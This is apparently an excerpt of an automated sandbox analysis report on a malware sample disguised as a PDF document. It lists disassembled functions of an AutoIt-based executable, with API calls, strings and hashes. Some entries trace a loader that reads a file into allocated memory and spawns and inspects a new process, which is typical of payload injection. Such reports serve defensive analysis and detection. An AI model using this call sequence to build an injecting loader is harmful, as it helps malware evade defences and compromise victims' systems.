                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
                                    • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                    • API String ID: 2673923337-2727554177
                                    • Opcode ID: fff3da0ea6ecb6e52f38f85ece088a29e82626c2d1b7f06f02685840333d82e9
                                    • Instruction ID: 6dfe190273fe8215fb9df8ce72d571a7dbaca62c82a7e7c644b02404f8bbf22b
                                    • Opcode Fuzzy Hash: fff3da0ea6ecb6e52f38f85ece088a29e82626c2d1b7f06f02685840333d82e9
                                    • Instruction Fuzzy Hash: A571B1718083019EC324EF26EC8589FB7E8FF94790F44442EF495A7264EB399949DF62
                                    Function 00FB3A58 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 71windowregistryCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    APIs
                                    • GetSysColorBrush.USER32(0000000F), ref: 00FB3A62
                                    • LoadCursorW.USER32(00000000,00007F00), ref: 00FB3A71
                                    • LoadIconW.USER32(00000063), ref: 00FB3A88
                                    • LoadIconW.USER32(000000A4), ref: 00FB3A9A
                                    • LoadIconW.USER32(000000A2), ref: 00FB3AAC
                                    • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00FB3AD2
                                    • RegisterClassExW.USER32(?), ref: 00FB3B28
                                      • Part of subcall function 00FB3041: GetSysColorBrush.USER32(0000000F), ref: 00FB3074
                                      • Part of subcall function 00FB3041: RegisterClassExW.USER32(00000030), ref: 00FB309E
                                      • Part of subcall function 00FB3041: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00FB30AF
                                      • Part of subcall function 00FB3041: InitCommonControlsEx.COMCTL32(?), ref: 00FB30CC
                                      • Part of subcall function 00FB3041: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00FB30DC
                                      • Part of subcall function 00FB3041: LoadIconW.USER32(000000A9), ref: 00FB30F2
                                      • Part of subcall function 00FB3041: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00FB3101
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                    • String ID: #$0$AutoIt v3
                                    • API String ID: 423443420-4155596026
                                    • Opcode ID: 03322d027bef1076f82e8b1fb18664b1b7c0270a52100727daf2180c0db158f7
                                    • Instruction ID: 8b08f163853aba8cadef6aec5d004524bba24b86ee4cd94a51c585e5ed67a699
                                    • Opcode Fuzzy Hash: 03322d027bef1076f82e8b1fb18664b1b7c0270a52100727daf2180c0db158f7
                                    • Instruction Fuzzy Hash: BA217A70E00B09AFEB619FA5E809B9D7BB5FB08710F00012AF681B6294C7BF56459F90
                                    Function 00FB3633 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 151windowtimeregistryCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 767 fb3633-fb3681 769 fb3683-fb3686 767->769 770 fb36e1-fb36e3 767->770 772 fb3688-fb368f 769->772 773 fb36e7 769->773 770->769 771 fb36e5 770->771 774 fb36ca-fb36d2 DefWindowProcW 771->774 777 fb375d-fb3765 PostQuitMessage 772->777 778 fb3695-fb369a 772->778 775 fed31c-fed34a call fc11d0 call fc11f3 773->775 776 fb36ed-fb36f0 773->776 782 fb36d8-fb36de 774->782 811 fed34f-fed356 775->811 784 fb36f2-fb36f3 776->784 785 fb3715-fb373c SetTimer RegisterWindowMessageW 776->785 783 fb3711-fb3713 777->783 779 fed38f-fed3a3 call 1012a16 778->779 780 fb36a0-fb36a2 778->780 779->783 803 fed3a9 779->803 786 fb36a8-fb36ad 780->786 787 fb3767-fb3776 call fb4531 780->787 783->782 791 fed2bf-fed2c2 784->791 792 fb36f9-fb370c KillTimer call fb44cb call fb3114 784->792 785->783 788 fb373e-fb3749 CreatePopupMenu 785->788 793 fb36b3-fb36b8 786->793 794 fed374-fed37b 786->794 787->783 788->783 798 fed2f8-fed317 MoveWindow 791->798 799 fed2c4-fed2c6 791->799 792->783 801 fb374b-fb375b call fb45df 793->801 802 fb36be-fb36c4 793->802 794->774 809 fed381-fed38a call 100817e 794->809 798->783 806 fed2c8-fed2cb 799->806 807 fed2e7-fed2f3 SetFocus 799->807 801->783 802->774 802->811 803->774 806->802 812 fed2d1-fed2e2 call fc11d0 806->812 807->783 809->774 811->774 817 fed35c-fed36f call fb44cb call fb43db 811->817 812->783 817->774
                                    APIs
                                    • DefWindowProcW.USER32(?,?,?,?), ref: 00FB36D2
                                    • KillTimer.USER32(?,00000001), ref: 00FB36FC
                                    • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00FB371F
                                    • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00FB372A
                                    • CreatePopupMenu.USER32 ref: 00FB373E
                                    • PostQuitMessage.USER32(00000000), ref: 00FB375F
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                    • String ID: TaskbarCreated
                                    • API String ID: 129472671-2362178303
                                    • Opcode ID: fce55cc577202ec5d72cd5d19c0ec91c170aa01157ca6f780195e54e5a957014
                                    • Instruction ID: 2aeae244c88e7edbc6e866b7ea728de482b012bfcfa5c28c86382707a6304174
                                    • Opcode Fuzzy Hash: fce55cc577202ec5d72cd5d19c0ec91c170aa01157ca6f780195e54e5a957014
                                    • Instruction Fuzzy Hash: 6B4129B2E44906ABEB245F26DC09FF93759F700310F240119F983D6296CE6BAD10BF62
                                    Function 00FB3778 Relevance: 14.3, APIs: 1, Strings: 7, Instructions: 267COMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: FileLibraryLoadModuleName__wcsicmp_l_memmove
                                    • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$>>>AUTOIT NO CMDEXECUTE<<<$CMDLINE$CMDLINERAW
                                    • API String ID: 1825951767-3513169116
                                    • Opcode ID: 16cdeed9b1406ed1a439dd457aaea8f681556aefb9458150eaab90e5bb311467
                                    • Instruction ID: 55935d4dfbcc86e87d362b797b78816e468a3709e315b8d57c964aacc3aa6a70
                                    • Opcode Fuzzy Hash: 16cdeed9b1406ed1a439dd457aaea8f681556aefb9458150eaab90e5bb311467
                                    • Instruction Fuzzy Hash: 04A16072C146299ADB04FFA2CC91AEEB77DBF54300F04042AE452B7181DF799A09EF61
                                    Function 00F825E0 Relevance: 10.7, APIs: 7, Instructions: 239fileCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 942 f825e0-f8268e call f80000 945 f82695-f826bb call f834f0 CreateFileW 942->945 948 f826bd 945->948 949 f826c2-f826d2 945->949 950 f8280d-f82811 948->950 957 f826d9-f826f3 VirtualAlloc 949->957 958 f826d4 949->958 951 f82853-f82856 950->951 952 f82813-f82817 950->952 954 f82859-f82860 951->954 955 f82819-f8281c 952->955 956 f82823-f82827 952->956 961 f82862-f8286d 954->961 962 f828b5-f828ca 954->962 955->956 963 f82829-f82833 956->963 964 f82837-f8283b 956->964 959 f826fa-f82711 ReadFile 957->959 960 f826f5 957->960 958->950 965 f82718-f82758 VirtualAlloc 959->965 966 f82713 959->966 960->950 967 f8286f 961->967 968 f82871-f8287d 961->968 969 f828da-f828e2 962->969 970 f828cc-f828d7 VirtualFree 962->970 963->964 971 f8284b 964->971 972 f8283d-f82847 964->972 973 f8275a 965->973 974 f8275f-f8277a call f83740 965->974 966->950 967->962 975 f8287f-f8288f 968->975 976 f82891-f8289d 968->976 970->969 971->951 972->971 973->950 982 f82785-f8278f 974->982 978 f828b3 975->978 979 f828aa-f828b0 976->979 980 f8289f-f828a8 976->980 978->954 979->978 980->978 983 f82791-f827c0 call f83740 982->983 984 f827c2-f827d6 call f83550 982->984 983->982 989 f827d8 984->989 990 f827da-f827de 984->990 989->950 992 f827ea-f827ee 990->992 993 f827e0-f827e4 FindCloseChangeNotification 990->993 994 f827fe-f82807 992->994 995 f827f0-f827fb VirtualFree 992->995 993->992 994->945 994->950 995->994
                                    APIs
                                    • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 00F826B1
                                    • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00F828D7
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673274915.0000000000F80000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F80000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f80000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: CreateFileFreeVirtual
                                    • String ID:
                                    • API String ID: 204039940-0
                                    • Opcode ID: 014c9b5c74d83c0a726ef6016946af978a068631e2f3efa1e9065a42f07dad7c
                                    • Instruction ID: e6ec8680761e95e659f0e6dcef07dee81a0f748c2ad58a7f315a22c4701be83b
                                    • Opcode Fuzzy Hash: 014c9b5c74d83c0a726ef6016946af978a068631e2f3efa1e9065a42f07dad7c
                                    • Instruction Fuzzy Hash: 63A10574E00209EBDF54DFA4C994BEEBBB5BF48314F208159E501BB280D779AA81DF94
                                    Function 00FB39E7 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44COMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 1073 fb39e7-fb3a57 CreateWindowExW * 2 ShowWindow * 2
                                    APIs
                                    • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00FB3A15
                                    • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00FB3A36
                                    • ShowWindow.USER32(00000000,?,?), ref: 00FB3A4A
                                    • ShowWindow.USER32(00000000,?,?), ref: 00FB3A53
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: Window$CreateShow
                                    • String ID: AutoIt v3$edit
                                    • API String ID: 1584632944-3779509399
                                    • Opcode ID: 999d457dc9175707260dc1722d764d24290b2a89d6a8c789d417907f9b9cda86
                                    • Instruction ID: cd218283b908f8d2a6d6ef0effbf1620ce468298ee242e28963e30963cc99495
                                    • Opcode Fuzzy Hash: 999d457dc9175707260dc1722d764d24290b2a89d6a8c789d417907f9b9cda86
                                    • Instruction Fuzzy Hash: 8CF03A70E00A907EFA711663AC09E272E7DE7C6F50B00401EBA41F2264C6AB0802DBB1
                                    Function 00F823B0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 143fileCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 1074 f823b0-f824d4 call f80000 call f822a0 CreateFileW 1081 f824db-f824eb 1074->1081 1082 f824d6 1074->1082 1085 f824ed 1081->1085 1086 f824f2-f8250c VirtualAlloc 1081->1086 1083 f8258b-f82590 1082->1083 1085->1083 1087 f8250e 1086->1087 1088 f82510-f82527 ReadFile 1086->1088 1087->1083 1089 f82529 1088->1089 1090 f8252b-f82565 call f822e0 call f812a0 1088->1090 1089->1083 1095 f82581-f82589 ExitProcess 1090->1095 1096 f82567-f8257c call f82330 1090->1096 1095->1083 1096->1095
                                    APIs
                                      • Part of subcall function 00F822A0: Sleep.KERNELBASE(000001F4), ref: 00F822B1
                                    • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 00F824CA
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673274915.0000000000F80000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F80000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f80000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: CreateFileSleep
                                    • String ID: JBBI7A9KWERFPGMX2WUKC
                                    • API String ID: 2694422964-1034247826
                                    • Opcode ID: b64c8992c39bf7294d7b722e2f18f414a852a12c420bce021adb3e11384fd799
                                    • Instruction ID: 0f70daa81231aadc8d8974f4bb61526be91c9083ec974e545917d60c48c72fea
                                    • Opcode Fuzzy Hash: b64c8992c39bf7294d7b722e2f18f414a852a12c420bce021adb3e11384fd799
                                    • Instruction Fuzzy Hash: 7051B070D04249DAEF11DBA4C859BEFBBB8AF15300F144199E608BB2C1D6B91B44DBA5
                                    Function 00FD564D Relevance: 7.7, APIs: 5, Instructions: 163COMMONLIBRARYCODE
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 1098 fd564d-fd5666 1099 fd5668-fd566d 1098->1099 1100 fd5683 1098->1100 1099->1100 1101 fd566f-fd5671 1099->1101 1102 fd5685-fd568b 1100->1102 1103 fd568c-fd5691 1101->1103 1104 fd5673-fd5678 call fd8d68 1101->1104 1105 fd569f-fd56a3 1103->1105 1106 fd5693-fd569d 1103->1106 1116 fd567e call fd8ff6 1104->1116 1109 fd56a5-fd56b0 call fd3020 1105->1109 1110 fd56b3-fd56b5 1105->1110 1106->1105 1108 fd56c3-fd56d2 1106->1108 1114 fd56d9 1108->1114 1115 fd56d4-fd56d7 1108->1115 1109->1110 1110->1104 1113 fd56b7-fd56c1 1110->1113 1113->1104 1113->1108 1118 fd56de-fd56e3 1114->1118 1115->1118 1116->1100 1120 fd57cc-fd57cf 1118->1120 1121 fd56e9-fd56f0 1118->1121 1120->1102 1122 fd5731-fd5733 1121->1122 1123 fd56f2-fd56fa 1121->1123 1124 fd579d-fd579e call fe0df7 1122->1124 1125 fd5735-fd5737 1122->1125 1123->1122 1126 fd56fc 1123->1126 1135 fd57a3-fd57a7 1124->1135 1128 fd5739-fd5741 1125->1128 1129 fd575b-fd5766 1125->1129 1130 fd57fa 1126->1130 1131 fd5702-fd5704 1126->1131 1136 fd5751-fd5755 1128->1136 1137 fd5743-fd574f 1128->1137 1138 fd5768 1129->1138 1139 fd576a-fd576d 1129->1139 1134 fd57fe-fd5807 1130->1134 1132 fd570b-fd5710 1131->1132 1133 fd5706-fd5708 1131->1133 1140 fd57d4-fd57d8 1132->1140 1141 fd5716-fd572f call fe0f18 1132->1141 1133->1132 1134->1102 1135->1134 1142 fd57a9-fd57ae 1135->1142 1143 fd5757-fd5759 1136->1143 1137->1143 1138->1139 1139->1140 1144 fd576f-fd577b call fd4916 call fe10ab 1139->1144 1147 fd57ea-fd57f5 call fd8d68 1140->1147 1148 fd57da-fd57e7 call fd3020 1140->1148 1158 fd5792-fd579b 1141->1158 1142->1140 1146 fd57b0-fd57c1 1142->1146 1143->1139 1159 fd5780-fd5785 1144->1159 1153 fd57c4-fd57c6 1146->1153 1147->1116 1148->1147 1153->1120 1153->1121 1158->1153 1160 fd580c-fd5810 1159->1160 1161 fd578b-fd578e 1159->1161 1160->1134 1161->1130 1162 fd5790 1161->1162 1162->1158
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                                    • String ID:
                                    • API String ID: 1559183368-0
                                    • Opcode ID: cbc132a2d90f1fa170c901e77712e707e3c45fd9b9f6dd10e42efcbbdaed9f46
                                    • Instruction ID: f721b242ceea01cbe5225976beeb2c1c7c3c0cabc7b97f356c75ad8b3db46e3d
                                    • Opcode Fuzzy Hash: cbc132a2d90f1fa170c901e77712e707e3c45fd9b9f6dd10e42efcbbdaed9f46
                                    • Instruction Fuzzy Hash: D5519131E00B09DBDB249F69888466E7BA3AF40B70F3C872BE825963D0D774DD51AB40
                                    Function 00FB69CA Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 260COMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 1163 fb69ca-fb69f1 call fb4f3d 1166 fee45a-fee46a call 10197e5 1163->1166 1167 fb69f7-fb6a05 call fb4f3d 1163->1167 1171 fee46f-fee471 1166->1171 1167->1166 1172 fb6a0b-fb6a11 1167->1172 1173 fee473-fee476 call fb4faa 1171->1173 1174 fee490-fee4d8 call fd0ff6 1171->1174 1176 fee47b-fee48a call 1014534 1172->1176 1177 fb6a17-fb6a39 call fb6bec 1172->1177 1173->1176 1183 fee4fd 1174->1183 1184 fee4da-fee4e4 1174->1184 1176->1174 1187 fee4ff-fee512 1183->1187 1186 fee4f8-fee4f9 1184->1186 1188 fee4fb 1186->1188 1189 fee4e6-fee4f5 1186->1189 1190 fee518 1187->1190 1191 fee689-fee68c call fd2f95 1187->1191 1188->1187 1189->1186 1193 fee51f-fee522 call fb75e0 1190->1193 1194 fee691-fee69a call fb4faa 1191->1194 1197 fee527-fee549 call fb5f12 call 101768b 1193->1197 1201 fee69c-fee6ac call fb7776 call fb5efb 1194->1201 1206 fee55d-fee567 call 1017675 1197->1206 1207 fee54b-fee558 1197->1207 1214 fee6b1-fee6e1 call 100fcb1 call fd106c call fd2f95 call fb4faa 1201->1214 1216 fee569-fee57c 1206->1216 1217 fee581-fee58b call 101765f 1206->1217 1209 fee650-fee660 call fb766f 1207->1209 1209->1197 1219 fee666-fee670 call fb74bd 1209->1219 1214->1201 1216->1209 1226 fee59f-fee5a9 call fb5f8a 1217->1226 1227 fee58d-fee59a 1217->1227 1225 fee675-fee683 1219->1225 1225->1191 1225->1193 1226->1209 1233 fee5af-fee5c7 call 100fc4d 1226->1233 1227->1209 1238 fee5ea-fee5ed 1233->1238 1239 fee5c9-fee5e8 call fb7f41 call fb5a64 1233->1239 1241 fee5ef-fee60a call fb7f41 call fb6999 call fb5a64 1238->1241 1242 fee61b-fee61e 1238->1242 1263 fee60b-fee619 call fb5f12 1239->1263 1241->1263 1244 fee63e-fee641 call 1017621 1242->1244 1245 fee620-fee629 call 100fb6e 1242->1245 1252 fee646-fee64f call fd106c 1244->1252 1245->1214 1255 fee62f-fee639 call fd106c 1245->1255 1252->1209 1255->1197 1263->1252
                                    APIs
                                      • Part of subcall function 00FB4F3D: LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,010762F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00FB4F6F
                                    • _free.LIBCMT ref: 00FEE68C
                                    • _free.LIBCMT ref: 00FEE6D3
                                      • Part of subcall function 00FB6BEC: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00FB6D0D
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: _free$CurrentDirectoryLibraryLoad
                                    • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                                    • API String ID: 2861923089-1757145024
                                    • Opcode ID: 4bada6c5fc1b6f67a6a9cc1bb2a28a4f3fd42d1c88d96120a7c1a52895a4335b
                                    • Instruction ID: 54825d6d77ec49d64d1d294cd309f86146154157c428482d57722f555b78c447
                                    • Opcode Fuzzy Hash: 4bada6c5fc1b6f67a6a9cc1bb2a28a4f3fd42d1c88d96120a7c1a52895a4335b
                                    • Instruction Fuzzy Hash: 14917071910259EFCF04EFA6DC919EDB7B8FF18310F14446AE815AB2A1DB38A904EF50
                                    Function 00FB35B0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 59registryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,00FB35A1,SwapMouseButtons,00000004,?), ref: 00FB35D4
                                    • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,00FB35A1,SwapMouseButtons,00000004,?,?,?,?,00FB2754), ref: 00FB35F5
                                    • RegCloseKey.KERNELBASE(00000000,?,?,00FB35A1,SwapMouseButtons,00000004,?,?,?,?,00FB2754), ref: 00FB3617
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: CloseOpenQueryValue
                                    • String ID: Control Panel\Mouse
                                    • API String ID: 3677997916-824357125
                                    • Opcode ID: 9a835222e6241222ad2a4eed7f0b69426e8b7342db70bd3b4c9de509b7aa3867
                                    • Instruction ID: b42b82d67974d81e152ac2626bc02fbad9c921aed13ac28652f8df1853747a7c
                                    • Opcode Fuzzy Hash: 9a835222e6241222ad2a4eed7f0b69426e8b7342db70bd3b4c9de509b7aa3867
                                    • Instruction Fuzzy Hash: EA115AB5950208BFDB209F69DC84EEEB7BDEF04750F005459F805D7210D2719F40AB60
                                    Function 00F812A0 Relevance: 6.7, APIs: 4, Instructions: 720processthreadCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CreateProcessW.KERNELBASE(?,00000000), ref: 00F81A5B
                                    • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 00F81AF1
                                    • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00F81B13
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673274915.0000000000F80000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F80000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f80000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: Process$ContextCreateMemoryReadThreadWow64
                                    • String ID:
                                    • API String ID: 2438371351-0
                                    • Opcode ID: cc658a0e6010fd3573e63fe9dffc1f366d2843c5c23e1a249a06af30add5367b
                                    • Instruction ID: 9e797271919d33981f329c631c7e33a23096da5240c8e24e04ba5a05667e1b7a
                                    • Opcode Fuzzy Hash: cc658a0e6010fd3573e63fe9dffc1f366d2843c5c23e1a249a06af30add5367b
                                    • Instruction Fuzzy Hash: 1D621830A14258DBEB24DFA4C840BDEB376FF58700F1091A9D10DEB290E77A9E81DB59
                                    Function 010197E5 Relevance: 6.2, APIs: 4, Instructions: 155COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00FB5045: _fseek.LIBCMT ref: 00FB505D
                                      • Part of subcall function 010199BE: _wcscmp.LIBCMT ref: 01019AAE
                                      • Part of subcall function 010199BE: _wcscmp.LIBCMT ref: 01019AC1
                                    • _free.LIBCMT ref: 0101992C
                                    • _free.LIBCMT ref: 01019933
                                    • _free.LIBCMT ref: 0101999E
                                      • Part of subcall function 00FD2F95: RtlFreeHeap.NTDLL(00000000,00000000,?,00FD9C64), ref: 00FD2FA9
                                      • Part of subcall function 00FD2F95: GetLastError.KERNEL32(00000000,?,00FD9C64), ref: 00FD2FBB
                                    • _free.LIBCMT ref: 010199A6
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                    • String ID:
                                    • API String ID: 1552873950-0
